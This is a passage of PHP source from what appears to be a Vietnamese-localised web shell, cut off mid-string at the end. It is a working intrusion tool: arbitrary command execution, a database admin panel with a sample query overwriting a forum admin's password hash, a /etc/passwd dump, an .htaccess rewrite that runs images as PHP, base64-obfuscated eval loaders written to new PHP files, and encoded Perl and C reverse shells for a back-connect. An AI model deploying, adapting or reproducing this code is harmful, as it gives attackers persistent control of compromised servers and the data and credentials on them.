  612. p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
  613. makehide('action','file');
  614. makehide('thefile');
  615. makehide('doing');
  616. makehide('dir',$nowpath);
  617. $file_i = '0';
  618. foreach($filedata as $key =>$filedb){
  619. if($filedb['filename']!='..'&&$filedb['filename']!='.') {
  620. $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
  621. $thisbg = bg();
  622. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
  623. p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
  624. p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
  625. p('<td nowrap>'.$filedb['mtime'].'</td>');
  626. p('<td nowrap>'.$filedb['size'].'</td>');
  627. p('<td nowrap>');
  628. p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
  629. p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
  630. p('<td nowrap>');
  631. p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">T&#7843;i Xu&#7889;ng</a> | ');
  632. p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Sao Ch&#233;p</a> | ');
  633. p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Ch&#7881;nh S&#7917;a</a> | ');
  634. p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">&#272;&#7893;i T&#234;n</a> | ');
  635. p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Th&#7901;i Gian</a>');
  636. p('</td></tr>');
  637. $file_i++;
  638. }
  639. }
  640. p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">T&#7843;i Xu&#7889;ng</a> - <a href="javascript:dofile(\'delfiles\');"> X&#243;a File </a></td><td colspan="4" align="right">'.$dir_i.' Th&#432; M&#7909;c / '.$file_i.' Files</td></tr>');
  641. p('</form></table>');
  642. }
  643. ;echo '<script type="text/javascript">
  644. function mysqlfile(doing){
  645. if(!doing) return;
  646. $(\'doing\').value=doing;
  647. $(\'mysqlfile\').dbhost.value=$(\'dbinfo\').dbhost.value;
  648. $(\'mysqlfile\').dbport.value=$(\'dbinfo\').dbport.value;
  649. $(\'mysqlfile\').dbuser.value=$(\'dbinfo\').dbuser.value;
  650. $(\'mysqlfile\').dbpass.value=$(\'dbinfo\').dbpass.value;
  651. $(\'mysqlfile\').dbname.value=$(\'dbinfo\').dbname.value;
  652. $(\'mysqlfile\').charset.value=$(\'dbinfo\').charset.value;
  653. $(\'mysqlfile\').submit();
  654. }
  655. </script>
  656. ';
  657. if ($action == 'sqladmin') {
  658. !$dbhost &&$dbhost = 'localhost';
  659. !$dbuser &&$dbuser = 'HandS Team';
  660. !$dbport &&$dbport = '3306';
  661. $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
  662. if(isset($dbhost)){
  663. $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
  664. }
  665. if(isset($dbuser)) {
  666. $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
  667. }
  668. if(isset($dbpass)) {
  669. $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
  670. }
  671. if(isset($dbport)) {
  672. $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
  673. }
  674. if(isset($dbname)) {
  675. $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
  676. }
  677. if(isset($charset)) {
  678. $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
  679. }
  680. if ($doing == 'backupmysql'&&$saveasfile) {
  681. if (!$table) {
  682. m('Please choose the table');
  683. }else {
  684. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
  685. $table = array_flip($table);
  686. $fp = @fopen($path,'w');
  687. if ($fp) {
  688. $result = q('SHOW tables');
  689. if (!$result) p('<h2>'.mysql_error().'</h2>');
  690. $mysqldata = '';
  691. while ($currow = mysql_fetch_array($result)) {
  692. if (isset($table[$currow[0]])) {
  693. sqldumptable($currow[0],$fp);
  694. }
  695. }
  696. fclose($fp);
  697. $fileurl = str_replace(SA_ROOT,'',$path);
  698. m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
  699. mysql_close();
  700. }else {
  701. m('Backup failed');
  702. }
  703. }
  704. }
  705. if ($insert &&$insertsql) {
  706. $keystr = $valstr = $tmp = '';
  707. foreach($insertsql as $key =>$val) {
  708. if ($val) {
  709. $keystr .= $tmp.$key;
  710. $valstr .= $tmp."'".addslashes($val)."'";
  711. $tmp = ',';
  712. }
  713. }
  714. if ($keystr &&$valstr) {
  715. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
  716. m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ?'Insert new record of success': mysql_error());
  717. }
  718. }
  719. if ($update &&$insertsql &&$base64) {
  720. $valstr = $tmp = '';
  721. foreach($insertsql as $key =>$val) {
  722. $valstr .= $tmp.$key."='".addslashes($val)."'";
  723. $tmp = ',';
  724. }
  725. if ($valstr) {
  726. $where = base64_decode($base64);
  727. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
  728. m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ?'Record updating': mysql_error());
  729. }
  730. }
  731. if ($doing == 'del'&&$base64) {
  732. $where = base64_decode($base64);
  733. $delete_sql = "DELETE FROM $tablename WHERE $where";
  734. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
  735. m(q("DELETE FROM $tablename WHERE $where") ?'Deletion record of success': mysql_error());
  736. }
  737. if ($tablename &&$doing == 'drop') {
  738. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
  739. if (q("DROP TABLE $tablename")) {
  740. m('Drop table of success');
  741. $tablename = '';
  742. }else {
  743. m(mysql_error());
  744. }
  745. }
  746. $charsets = array(''=>'Default','gbk'=>'GBK','big5'=>'Big5','utf8'=>'UTF-8','latin1'=>'Latin1');
  747. formhead(array('title'=>'MYSQL Qu&#7843;n L&#253; '));
  748. makehide('action','sqladmin');
  749. p('<p>');
  750. p('DBHost:');
  751. makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
  752. p(':');
  753. makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
  754. p('DBUser:');
  755. makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
  756. p('DBPass:');
  757. makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
  758. p('DBCharset:');
  759. makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
  760. makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
  761. p('</p>');
  762. formfoot();
  763. ;echo '<script type="text/javascript">
  764. function editrecord(action, base64, tablename){
  765. if (action == \'del\') {
  766. if (!confirm(\'Is or isn\\\'t deletion record?\')) return;
  767. }
  768. $(\'recordlist\').doing.value=action;
  769. $(\'recordlist\').base64.value=base64;
  770. $(\'recordlist\').tablename.value=tablename;
  771. $(\'recordlist\').submit();
  772. }
  773. function moddbname(dbname) {
  774. if(!dbname) return;
  775. $(\'setdbname\').dbname.value=dbname;
  776. $(\'setdbname\').submit();
  777. }
  778. function settable(tablename,doing,page) {
  779. if(!tablename) return;
  780. if (doing) {
  781. $(\'settable\').doing.value=doing;
  782. }
  783. if (page) {
  784. $(\'settable\').page.value=page;
  785. }
  786. $(\'settable\').tablename.value=tablename;
  787. $(\'settable\').submit();
  788. }
  789. </script>
  790. ';
  791. formhead(array('name'=>'recordlist'));
  792. makehide('doing');
  793. makehide('action','sqladmin');
  794. makehide('base64');
  795. makehide('tablename');
  796. p($dbform);
  797. formfoot();
  798. formhead(array('name'=>'setdbname'));
  799. makehide('action','sqladmin');
  800. p($dbform);
  801. if (!$dbname) {
  802. makehide('dbname');
  803. }
  804. formfoot();
  805. formhead(array('name'=>'settable'));
  806. makehide('action','sqladmin');
  807. p($dbform);
  808. makehide('tablename');
  809. makehide('page',$page);
  810. makehide('doing');
  811. formfoot();
  812. $cachetables = array();
  813. $pagenum = 30;
  814. $page = intval($page);
  815. if($page) {
  816. $start_limit = ($page -1) * $pagenum;
  817. }else {
  818. $start_limit = 0;
  819. $page = 1;
  820. }
  821. if (isset($dbhost) &&isset($dbuser) &&isset($dbpass) &&isset($connect)) {
  822. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
  823. $mysqlver = mysql_get_server_info();
  824. p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
  825. $highver = $mysqlver >'4.1'?1 : 0;
  826. $query = q("SHOW DATABASES");
  827. $dbs = array();
  828. $dbs[] = 'Ch&#7885;n M&#7897;t C&#417; S&#7903; D&#7919; Li&#7879;u';
  829. while($db = mysql_fetch_array($query)) {
  830. $dbs[$db['Database']] = $db['Database'];
  831. }
  832. makeselect(array('title'=>'H&#227;y Ch&#7885;n M&#7897;t C&#417; S&#7903; D&#7919; Li&#7879;u','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
  833. $tabledb = array();
  834. if ($dbname) {
  835. p('<p>');
  836. p('Dababase Hi&#7879;n T&#7841;i: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
  837. if ($tablename) {
  838. p(' | Table Hi&#7879;n T&#7841;i: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
  839. }
  840. p('</p>');
  841. mysql_select_db($dbname);
  842. $getnumsql = '';
  843. $runquery = 0;
  844. if ($sql_query) {
  845. $runquery = 1;
  846. }
  847. $allowedit = 0;
  848. if ($tablename &&!$sql_query) {
  849. $sql_query = "SELECT * FROM $tablename";
  850. $getnumsql = $sql_query;
  851. $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
  852. $allowedit = 1;
  853. }
  854. p('<form action="'.$self.'" method="POST">');
  855. p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Ch&#7841;y Truy V&#7845;n Sql/Tr&#234;n C&#417; S&#7903; D&#7919; Li&#7879;u <font color=red><b>'.$dbname.'</font></b>:<BR>V&#361; D&#7909; M&#7853;t Kh&#7849;u VBB <font color=red>Marion001</font><BR><font color=yellow>UPDATE `user` SET `password` = \'20ec508bb4a6c454615f3414f6b47376\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
  856. </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
  857. makehide('tablename',$tablename);
  858. makehide('action','sqladmin');
  859. p($dbform);
  860. p('</form>');
  861. if ($tablename ||($runquery &&$sql_query)) {
  862. if ($doing == 'structure') {
  863. $result = q("SHOW COLUMNS FROM $tablename");
  864. $rowdb = array();
  865. while($row = mysql_fetch_array($result)) {
  866. $rowdb[] = $row;
  867. }
  868. p('<table border="0" cellpadding="3" cellspacing="0">');
  869. p('<tr class="head">');
  870. p('<td>Field</td>');
  871. p('<td>Type</td>');
  872. p('<td>Null</td>');
  873. p('<td>Key</td>');
  874. p('<td>Default</td>');
  875. p('<td>Extra</td>');
  876. p('</tr>');
  877. foreach ($rowdb as $row) {
  878. $thisbg = bg();
  879. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
  880. p('<td>'.$row['Field'].'</td>');
  881. p('<td>'.$row['Type'].'</td>');
  882. p('<td>'.$row['Null'].'&nbsp;</td>');
  883. p('<td>'.$row['Key'].'&nbsp;</td>');
  884. p('<td>'.$row['Default'].'&nbsp;</td>');
  885. p('<td>'.$row['Extra'].'&nbsp;</td>');
  886. p('</tr>');
  887. }
  888. tbfoot();
  889. }elseif ($doing == 'insert'||$doing == 'edit') {
  890. $result = q('SHOW COLUMNS FROM '.$tablename);
  891. while ($row = mysql_fetch_array($result)) {
  892. $rowdb[] = $row;
  893. }
  894. $rs = array();
  895. if ($doing == 'insert') {
  896. p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
  897. }else {
  898. p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
  899. $where = base64_decode($base64);
  900. $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
  901. $rs = mysql_fetch_array($result);
  902. }
  903. p('<form method="post" action="'.$self.'">');
  904. p($dbform);
  905. makehide('action','sqladmin');
  906. makehide('tablename',$tablename);
  907. p('<table border="0" cellpadding="3" cellspacing="0">');
  908. foreach ($rowdb as $row) {
  909. if ($rs[$row['Field']]) {
  910. $value = htmlspecialchars($rs[$row['Field']]);
  911. }else {
  912. $value = '';
  913. }
  914. $thisbg = bg();
  915. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
  916. p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
  917. }
  918. if ($doing == 'insert') {
  919. p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
  920. }else {
  921. p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
  922. makehide('base64',$base64);
  923. }
  924. p('</table></form>');
  925. }else {
  926. $querys = @explode(';',$sql_query);
  927. foreach($querys as $num=>$query) {
  928. if ($query) {
  929. p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
  930. switch(qy($query))
  931. {
  932. case 0:
  933. p('<h2>Error : '.mysql_error().'</h2>');
  934. break;
  935. case 1:
  936. if (strtolower(substr($query,0,13)) == 'select * from') {
  937. $allowedit = 1;
  938. }
  939. if ($getnumsql) {
  940. $tatol = mysql_num_rows(q($getnumsql));
  941. $multipage = multi($tatol,$pagenum,$page,$tablename);
  942. }
  943. if (!$tablename) {
  944. $sql_line = str_replace(array("\r","\n","\t"),array(' ',' ',' '),trim(htmlspecialchars($query)));
  945. $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i"," ",$sql_line);
  946. preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
  947. $tablename = $matches[1][0];
  948. }
  949. $result = q($query);
  950. p($multipage);
  951. p('<table border="0" cellpadding="3" cellspacing="0">');
  952. p('<tr class="head">');
  953. if ($allowedit) p('<td>Ch&#7881;nh S&#7917;a</td>');
  954. $fieldnum = @mysql_num_fields($result);
  955. for($i=0;$i<$fieldnum;$i++){
  956. $name = @mysql_field_name($result,$i);
  957. $type = @mysql_field_type($result,$i);
  958. $len = @mysql_field_len($result,$i);
  959. p("<td nowrap>$name<br><span>$type($len)</span></td>");
  960. }
  961. p('</tr>');
  962. while($mn = @mysql_fetch_assoc($result)){
  963. $thisbg = bg();
  964. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
  965. $where = $tmp = $b1 = '';
  966. foreach($mn as $key=>$inside){
  967. if ($inside) {
  968. $where .= $tmp.$key."='".addslashes($inside)."'";
  969. $tmp = ' AND ';
  970. }
  971. $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
  972. }
  973. $where = base64_encode($where);
  974. if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">S&#7917;a</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">X&#243;a</a></td>');
  975. p($b1);
  976. p('</tr>');
  977. unset($b1);
  978. }
  979. tbfoot();
  980. p($multipage);
  981. break;
  982. case 2:
  983. $ar = mysql_affected_rows();
  984. p('<h2>affected rows : <b>'.$ar.'</b></h2>');
  985. break;
  986. }
  987. }
  988. }
  989. }
  990. }else {
  991. $query = q("SHOW TABLE STATUS");
  992. $table_num = $table_rows = $data_size = 0;
  993. $tabledb = array();
  994. while($table = mysql_fetch_array($query)) {
  995. $data_size = $data_size +$table['Data_length'];
  996. $table_rows = $table_rows +$table['Rows'];
  997. $table['Data_length'] = sizecount($table['Data_length']);
  998. $table_num++;
  999. $tabledb[] = $table;
  1000. }
  1001. $data_size = sizecount($data_size);
  1002. unset($table);
  1003. p('<table border="0" cellpadding="0" cellspacing="0">');
  1004. p('<form action="'.$self.'" method="POST">');
  1005. makehide('action','sqladmin');
  1006. p($dbform);
  1007. p('<tr class="head">');
  1008. p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
  1009. p('<td>Name</td>');
  1010. p('<td>Rows</td>');
  1011. p('<td>Data_length</td>');
  1012. p('<td>Create_time</td>');
  1013. p('<td>Update_time</td>');
  1014. if ($highver) {
  1015. p('<td>Engine</td>');
  1016. p('<td>Collation</td>');
  1017. }
  1018. p('</tr>');
  1019. foreach ($tabledb as $key =>$table) {
  1020. $thisbg = bg();
  1021. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
  1022. p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
  1023. p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
  1024. p('<td>'.$table['Rows'].'</td>');
  1025. p('<td>'.$table['Data_length'].'</td>');
  1026. p('<td>'.$table['Create_time'].'</td>');
  1027. p('<td>'.$table['Update_time'].'</td>');
  1028. if ($highver) {
  1029. p('<td>'.$table['Engine'].'</td>');
  1030. p('<td>'.$table['Collation'].'</td>');
  1031. }
  1032. p('</tr>');
  1033. }
  1034. p('<tr class=fout>');
  1035. p('<td>&nbsp;</td>');
  1036. p('<td>Total tables: '.$table_num.'</td>');
  1037. p('<td>'.$table_rows.'</td>');
  1038. p('<td>'.$data_size.'</td>');
  1039. p('<td colspan="'.($highver ?4 : 2).'">&nbsp;</td>');
  1040. p('</tr>');
  1041. p("<tr class=\"fout\"><td colspan=\"".($highver ?8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> T&#7843;i Xu&#7889;ng File <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
  1042. makehide('doing','backupmysql');
  1043. formfoot();
  1044. p("</table>");
  1045. fr($query);
  1046. }
  1047. }
  1048. }
  1049. tbfoot();
  1050. @mysql_close();
  1051. }
  1052. elseif ($action == 'etcpwd') {
  1053. formhead(array('title'=>'Get /etc/passwd'));
  1054. makehide('action','etcpwd');
  1055. makehide('dir',$nowpath);
  1056. $i = 0;
  1057. echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
  1058. while ($i <60000) {
  1059. $line = posix_getpwuid($i);
  1060. if (!empty($line)) {
  1061. while (list ($key,$vba_etcpwd) = each($line)){
  1062. echo "".$vba_etcpwd."\n";
  1063. break;
  1064. }
  1065. }
  1066. $i++;
  1067. }
  1068. echo "</textarea></p>";
  1069. formfoot();
  1070. }
  1071. elseif ($action == 'command') {
  1072. if (IS_WIN &&IS_COM) {
  1073. if($program &&$parameter) {
  1074. $shell= new COM('Shell.Application');
  1075. $a = $shell->ShellExecute($program,$parameter);
  1076. m('Program run has '.(!$a ?'success': 'fail'));
  1077. }
  1078. !$program &&$program = 'c:\windows\system32\cmd.exe';
  1079. !$parameter &&$parameter = '/c net start > '.SA_ROOT.'log.txt';
  1080. formhead(array('title'=>'Execute Program'));
  1081. makehide('action','shell');
  1082. makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
  1083. p('<p>');
  1084. makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
  1085. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
  1086. p('</p>');
  1087. formfoot();
  1088. }
  1089. formhead(array('title'=>'Execute Command'));
  1090. makehide('action','shell');
  1091. if (IS_WIN &&IS_COM) {
  1092. $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
  1093. makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
  1094. }
  1095. p('<p>');
  1096. makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
  1097. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
  1098. p('</p>');
  1099. formfoot();
  1100. if ($command) {
  1101. p('<hr width="100%" noshade /><pre>');
  1102. if ($execfunc=='wscript'&&IS_WIN &&IS_COM) {
  1103. $wsh = new COM('WScript.shell');
  1104. $exec = $wsh->exec('cmd.exe /c '.$command);
  1105. $stdout = $exec->StdOut();
  1106. $stroutput = $stdout->ReadAll();
  1107. echo $stroutput;
  1108. }elseif ($execfunc=='proc_open'&&IS_WIN &&IS_COM) {
  1109. $descriptorspec = array(
  1110. 0 =>array('pipe','r'),
  1111. 1 =>array('pipe','w'),
  1112. 2 =>array('pipe','w')
  1113. );
  1114. $process = proc_open($_SERVER['COMSPEC'],$descriptorspec,$pipes);
  1115. if (is_resource($process)) {
  1116. fwrite($pipes[0],$command."\r\n");
  1117. fwrite($pipes[0],"exit\r\n");
  1118. fclose($pipes[0]);
  1119. while (!feof($pipes[1])) {
  1120. echo fgets($pipes[1],1024);
  1121. }
  1122. fclose($pipes[1]);
  1123. while (!feof($pipes[2])) {
  1124. echo fgets($pipes[2],1024);
  1125. }
  1126. fclose($pipes[2]);
  1127. proc_close($process);
  1128. }
  1129. }else {
  1130. echo(execute($command));
  1131. }
  1132. p('</pre>');
  1133. }
  1134. }
  1135. elseif ($action == 'error.log') {
  1136. mkdir('error',0755);
  1137. chdir('error');
  1138. $kokdosya = ".htaccess";
  1139. $dosya_adi = "$kokdosya";
  1140. $dosya = fopen ($dosya_adi ,'w') or die ("Can not open file!");
  1141. $metin = "Options +FollowSymLinks +Indexes
  1142. DirectoryIndex default.html
  1143. ## START ##
  1144. Options +ExecCGI
  1145. AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
  1146. AddType application/x-httpd-php .jpg
  1147. RewriteEngine on
  1148. RewriteRule (.*)\.war$ .log
  1149. ## END ##";
  1150. fwrite ( $dosya ,$metin ) ;
  1151. fclose ($dosya);
  1152. $pythonp = '
  1153. ';
  1154. $file = fopen("error.log","w+");
  1155. $write = fwrite ($file ,base64_decode($pythonp));
  1156. fclose($file);
  1157. chmod("error.log",0755);
  1158. echo "<iframe src=error/error.log width=100% height=720px frameborder=0></iframe> ";
  1159. }
  1160. elseif ($action == 'jump') {
  1161. $file = fopen($dir."jump.php","w+");
  1162. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVll4WmpsbVVVVlhKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1163. ';
  1164. $file = fopen("jump.php","w+");
  1165. $write = fwrite ($file ,base64_decode($perltoolss));
  1166. fclose($file);
  1167. echo "<iframe src=jump.php width=100% height=720px frameborder=0></iframe> ";
  1168. }
  1169. elseif ($action == 'symlink') {
  1170. $file = fopen($dir."symlink.php","w+");
  1171. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVU42WWxSeWNqUjRKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1172. ';
  1173. $file = fopen("symlink.php","w+");
  1174. $write = fwrite ($file ,base64_decode($perltoolss));
  1175. fclose($file);
  1176. echo "<iframe src=symlink.php width=100% height=720px frameborder=0></iframe> ";
  1177. }
  1178. elseif ($action == 'newcommand') {
  1179. $file = fopen($dir."command.php","w+");
  1180. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQWG8zU0ZSWldGVjZKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1181. ';
  1182. $file = fopen("command.php","w+");
  1183. $write = fwrite ($file ,base64_decode($perltoolss));
  1184. fclose($file);
  1185. echo "<iframe src=command.php width=100% height=700px frameborder=0></iframe> ";
  1186. }
  1187. elseif ($action == 'backconnect') {!$yourip &&$yourip = $_SERVER['REMOTE_ADDR'];!$yourport &&$yourport = '7777';$usedb = array('perl'=>'perl','c'=>'c');$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"."hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"."sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"."kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"."KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"."OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC"."BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkc